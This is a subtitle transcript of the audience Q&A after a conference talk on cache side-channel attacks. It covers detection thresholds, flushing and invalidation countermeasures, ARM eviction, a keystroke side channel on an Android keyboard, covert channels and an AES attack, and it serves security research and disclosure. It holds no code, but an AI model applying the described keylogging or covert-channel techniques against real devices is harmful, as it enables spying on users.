Herald: Okay. Thank you very much again for your talk. Now we will have a Q&A, and we have, I think, about 15 minutes, so you can start lining up behind the microphones; they are in the gangways in the middle. Except, I think, that one... oh, no, it's back up, so it will work. And while we wait, I think we will take questions from our signal angel, if there are any. Okay, there aren't any, so... microphone questions. I think, you in front.
Microphone: Hi. Can you hear me?
Herald: Try again.
Microphone: Okay. Can you hear me now?
Okay. Yeah, I'd like to know what exactly
was your stealthiness metric? Was it that
you can't distinguish it from a normal
process, or...?
CM: So...
Herald: Wait a second. We still have the Q&A, so could you quiet down a bit? That would be nice.
CM: So, the question was about the stealthiness metric. Basically, we used the metric of cache misses and cache references, normalized by the instruction TLB events, and we just found a threshold such that pretty much every benign application was below it, and Rowhammer and cache attacks were above it. So we fixed the threshold, basically.
H: That microphone.
Microphone: Hello. Thanks for your talk.
It was great. First question: Did you
inform Intel before doing this talk?
CM: Nope.
Microphone: Okay. The second question: what are your future plans?
CM: Sorry?
M: What are your future plans?
CM: Ah, future plans. Well, what would be interesting: we keep finding these more or less by accident, or manually, so having a good idea of what the attack surface is here would be a good thing, and doing that automatically would be even better.
M: Great, thanks.
H: Okay, the microphone in the back,
over there. The guy in white.
M: Hi. One question. If you have, like, a daemon that randomly invalidates some cache lines, would that be a better countermeasure than disabling the caches?
ML: What was the question?
CM: If invalidating cache lines would be
better than disabling the whole cache. So,
I'm...
ML: If you know which cache lines have been accessed by the process, you can invalidate those cache lines before you swap those processes, but there's a performance trade-off. You can also flush the whole cache when you switch processes, and then it's empty and you don't see any activity anymore, but again there's the performance trade-off with this.
M: Okay, maybe a second question. There are some ARM architectures that have random cache-line invalidations. Did you try those, to see if you can still see a [unintelligible] channel there?
ML: If they're truly random... probably you just have to make more and more measurements, and then you can average out the noise, and then you can do these attacks again. It's like with Prime+Probe, where you need more measurements because it's much more noisy; in the end you will just need many more measurements.
CM: So, on ARM it's supposed to be pretty random, at least that's in the manual, but we actually found nice ways to evict the cache lines that we really wanted to evict, so it's not actually that pseudo-random. So even... let's say, if something is truly random, it might be nice, but then it's also quite complicated to implement. I mean, you probably don't want a random number generator just for the cache.
M: Okay. Thanks.
H: Okay, and then the three guys here on
the microphone in the front.
M: My question is about a detail of the keylogger. You could distinguish between space, backspace and alphabet characters, which is quite interesting. But could you also figure out the specific keys that were pressed, and if so, how?
ML: Yeah, that depends on the implementation of the keyboard. What we did is use the Android stock keyboard, which is shipped with the Samsung, so it's pre-installed. And if there is a table somewhere in the code which says "okay, if you press this exact location or this image, it's an A or a B", then you can also do a more sophisticated attack. So if you find any functions or data in the code that directly tell you "okay, this is this character", you can also spy on the actual key characters on the keyboard.
M: Thank you.
M: Hi. Thank you for your talk. My first question is: what can we actually do now to mitigate this kind of attack? By, for example, switching off TSX or using ECC RAM?
CM: So, I think the very important thing to protect would be crypto, and the good thing is that today we know how to build crypto that is resistant to side-channel attacks. So a good step would be to stop shipping implementations that have been known to be vulnerable for 10 years. Things like keystrokes are way harder to protect, so let's say crypto is manageable; the whole system is clearly another problem. And you can have different types of countermeasures on the hardware side, but that would mean that Intel and ARM actually want to fix this, and that they know how to fix it; I don't even know how to fix that in hardware. Then, on the system side, if you prevent some kinds of memory sharing, you don't have Flush+Reload anymore, and Prime+Probe is much noisier, so it would be an improvement.
M: Thank you.
H: Do we have signal angel questions? No. Okay, then more microphone questions.
M: Hi, thank you. I wanted to ask about the way you establish the side channel between the two processes, because it would obviously have to be timed in a way to transmit information from one process to the other. Did you document the whole thing anywhere? You know, it's actually almost like the seven layers or something like that. It would be really interesting to know how it worked.
ML: You can find this information in the papers, because there are several papers on covert channels using this. The NDSS paper is published in February, I guess, but the ARMageddon paper also includes a covert channel, and you can find more information about what the packets look like and how the synchronization works in the paper.
M: Thank you.
H: One last question?
M: Hi! You mentioned that you used Osvik's attack for the AES side channel. Did you solve the AES round detection, and is it different from some scheduler manipulation?
CM: So, on this one, I think we only did a synchronous attack, so we already knew when the victim was going to be scheduled, and we didn't have to do anything with the schedulers.
M: Alright, thank you.
H: Are there any more questions? No, I
don't see anyone. Then, thank you very
much again to our speakers.
applause
music
subtitles created by c3subtitles.de
in the year 2020. Join, and help us!